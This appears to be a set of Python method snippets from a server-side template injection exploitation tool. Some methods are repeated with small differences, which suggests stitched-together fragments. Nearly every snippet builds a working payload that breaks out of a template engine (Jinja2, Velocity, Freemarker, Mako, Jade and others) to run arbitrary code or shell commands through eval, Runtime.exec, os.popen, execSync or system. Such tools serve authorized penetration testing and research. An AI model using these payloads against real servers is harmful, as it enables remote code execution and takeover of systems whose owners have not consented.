def evaluate(self, code):
return self.inject("""{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}""" % (quote(code)))
def evaluate(self, code):
return self.inject("""{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}""" % (quote(code)))
def execute(self, command):
# I've tested the techniques described in this article
# http://blog.portswigger.net/2015/08/server-side-template-injection.html
# for it didn't work. Still keeping the check active to cover previous
# affected versions.
return self.inject("""#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end""" % (quote(command)))
def execute(self, command):
# I've tested the techniques described in this article
# http://blog.portswigger.net/2015/08/server-side-template-injection.html
# for it didn't work. Still keeping the check active to cover previous
# affected versions.
return self.inject("""#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end""" % (quote(command)))
def execute(self, command):
execution_code = '__import__("os").popen("%s").read()' % quote(command)
return self.evaluate(execution_code)
def execute(self, command):
return self.inject("""<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }""" % (quote(command)))
def execute(self, command):
return self.inject(
"""<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }"""
% (quote(command)))
def execute(self, command):
execution_code = '__import__("os").popen("%s").read()' % quote(command)
return self.evaluate(execution_code)
def execute(self, code, prefix = None, suffix = None, blind = False):
# Quote code before submitting it
return super(Jade, self).execute(quote(code), prefix, suffix, blind)
def execute(self, command):
execution_code = """= global.process.mainModule.require('child_process').execSync("%s")""" % quote(command)
return self.inject(execution_code)
def execute(self, command):
return self.inject("""<%% import os; x=os.popen("%s").read() %%>${x}""" % (quote(command)))
def execute(self, command):
return self.evaluate("""system("%s");""" % (quote(command)))
def execute(self, command):
execution_code = """= global.process.mainModule.require('child_process').execSync("%s")""" % quote(
command)
return self.inject(execution_code)
def execute(self, command):
return self.evaluate("""system("%s");""" % (quote(command)))
def evaluate(self, code, prefix = None, suffix = None, blind = False):
# Quote code before submitting it
return super(Jinja2, self).evaluate(quote(code), prefix, suffix, blind)